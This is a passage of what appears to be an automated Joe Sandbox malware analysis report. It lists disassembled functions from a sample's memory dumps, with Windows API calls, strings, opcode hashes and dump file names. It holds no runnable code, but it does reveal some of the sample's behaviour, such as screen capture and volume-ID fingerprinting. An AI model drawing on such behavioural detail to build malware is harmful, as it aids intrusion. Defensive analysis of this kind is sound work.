                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00622709
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00622714
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062271F
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062272D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 466feaca3e2f9e7342a46b23d8e45f605aa9631387e5ec163fda4abb866f448b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b47ecf27318f531ad1eeffc861463ad9233c5015de19be17fd04516091885cb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 466feaca3e2f9e7342a46b23d8e45f605aa9631387e5ec163fda4abb866f448b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6621A976910628EFCB41EFA4D842DDD7BB5BF08340F104169B5159B225DB35EB44CF84
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0062D104
                                                                                                                                                                                                                                                                                                                                  • CatchIt.LIBVCRUNTIME ref: 0062D263
                                                                                                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0062D364
                                                                                                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0062D37F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm$x2c
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2332921423-2991131675
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 163dd532efd54c396e6b451208fa216a273bb4e5311256e20c3e7a3552c99cc1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a7aaabb31a6812d5ccebe8c5d25f473da1fc805c9b17066ebe4c72a79fdbc492
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 163dd532efd54c396e6b451208fa216a273bb4e5311256e20c3e7a3552c99cc1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8B16871C00A29EFCF24DFA4E8859AEBBB6FF15310F14415AE8106B652D331DA52CF96
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen$_free
                                                                                                                                                                                                                                                                                                                                  • String ID: kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2325961074-1793498882
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9769739b001f6eadb3e1e83ae3cf41d94addc7be92a731268cb2b3a2bbb92614
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 61c9d2297b032ac057af5028e0998c01d988a8242d1b4cbb1b6a2adf9796f24e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9769739b001f6eadb3e1e83ae3cf41d94addc7be92a731268cb2b3a2bbb92614
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76C19AB4509341DFD724EF68D588A6ABBE1BB88304F108D1EF49987350DB74EA84DB87
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,\??\), ref: 005D284B
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 005D2852
                                                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005D29D6), ref: 005D285B
                                                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005D29D6), ref: 005D287C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: \??\$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1475610065-320376045
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d4a4ab6104889184def66bfa6d11b275c63fc30a7245a25efe39bffefaf44f54
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: be3464a7803e474b8c919f883d13698adafea30cd693fe81e116b28087890a11
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a4ab6104889184def66bfa6d11b275c63fc30a7245a25efe39bffefaf44f54
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95310A72B903057BE73057649C03F9E7A969FD1B04F08C038F754AF2C1E9B59A4447AA
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: :$C$\$l2%08x%08x%04x%xu
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3001812590-1811320126
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9db1dcd0a2f4d2de85f802f36d949995dc5f0f9dd2980a54ba6de12eae29b9b0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f8371ed85bc30fb3302e2191287f908889912d5712609b3c770febed97864c4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db1dcd0a2f4d2de85f802f36d949995dc5f0f9dd2980a54ba6de12eae29b9b0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC41DDB04193408BD354DF64C0986ABBBE1BF88718F005E2EF0C997290E779C6898B87
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86e10b00e9781aaef64d1b522fa316f2dd7d66e8a614ea769a7e548f6cf3cbae
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3debde41e86283d38642e6c272d6d52313f17ff020e1a130da3af7865d3de852
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86e10b00e9781aaef64d1b522fa316f2dd7d66e8a614ea769a7e548f6cf3cbae
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4610971D04B319BDB21AFB9B886EAE77E7AF00310B14416DE515973C1EB359E408F98
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4038537762-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5877b5240afc552e6f493f1ce03fe9b4b37eb9232e14122cd11426127e14f2ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b18c7fc7bba3ee13854fbd40490b75f4d25634d25b7749c557436ca0abd0f239
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5877b5240afc552e6f493f1ce03fe9b4b37eb9232e14122cd11426127e14f2ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F461E4B4905205DFCB14EFA8D98965EBBF5FF49300F10882EE88997304E735A954CB96
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4038537762-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4ac051092fa027453f7447f7d8e07408a6069708654ad6c4644a5d7ccb3f4307
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cf9f267bd25546cfadb36c95cfb084f6ee93f197c02919a0999aec89fe5a0414
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ac051092fa027453f7447f7d8e07408a6069708654ad6c4644a5d7ccb3f4307
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D51C6B49052019FCB00EFA8D98965EBFF5FF49310F11882DE88997314EB35A954CF96
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-537541572
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e04bc3025aa2597fa8a9c15546debf2dadc72e3bd4a41a08a8860fa33924a710
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3526cfcafb78ba24eadc99fc476e1065be46e5b1b8fa939af39bf4a8d6f7ca03
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e04bc3025aa2597fa8a9c15546debf2dadc72e3bd4a41a08a8860fa33924a710
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3521C632A01B36BBD7214B24EC58EAA3766AB517A0F255510FF15A7390DA30DD20CAE0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006262C0: _free.LIBCMT ref: 006262E5
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062622A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: RtlFreeHeap.NTDLL(00000000,00000000,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?), ref: 006232F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: GetLastError.KERNEL32(?,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?,?), ref: 0062330A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00626235
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00626240
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00626294
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062629F
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006262AA
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006262B5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d164b0b78da03c00ad40bd89565399c3cde5271e9215c4906fabfbff84f000e5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5145aaba00c9a7ad3b6202c22f3a5fc77dbded47b4557207179d47df5bdf282
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d164b0b78da03c00ad40bd89565399c3cde5271e9215c4906fabfbff84f000e5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A115C31552F64EAD5A0BBB0EC47FCB779E9F00700F404818B29B66192DB2AF7084B58
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00610269
                                                                                                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0061027A
                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00610284
                                                                                                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 006102A3
                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006102AB
                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 006102B2
                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 006102B9
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreateDeleteSelect$Bitmap
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1142853709-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 411983bdc37a6d958aeb85a41139b4c818d1f36887af8d91f215442a855a8d6a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 094ac11fa291b4bd507229dbe0281d680688498c53c89ef7a4843d7f552d6ac5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 411983bdc37a6d958aeb85a41139b4c818d1f36887af8d91f215442a855a8d6a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF03A32201314BFF3111BE0AC08FEF7BAEEB89B55F141418FA0592260CA769D018BA5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0061B5B2,?,?,0061B652,?,00000800,?), ref: 0061B53D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0061B550
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,0061B5B2,?,?,0061B652,?,00000800,?), ref: 0061B573
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$E_a$mscoree.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-14362687
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e1345811e09b4de016d763ff55a776d9629d43b07b5087bbc84aecce4435af14
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cde13a27f22be0b54ac990c37fc7fa881e604e93e3436c46ed3a31b278307cf6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1345811e09b4de016d763ff55a776d9629d43b07b5087bbc84aecce4435af14
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F01C31A41619FBDB119B51DD1ABDEBBBBEB40756F146060B801A21A0CBB09F40DBD0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(00638D38,00000010,?), ref: 006258F7
                                                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00625ADC
                                                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00625AF9
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,0061D33D,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00625B41
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00625B81
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00625C29
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
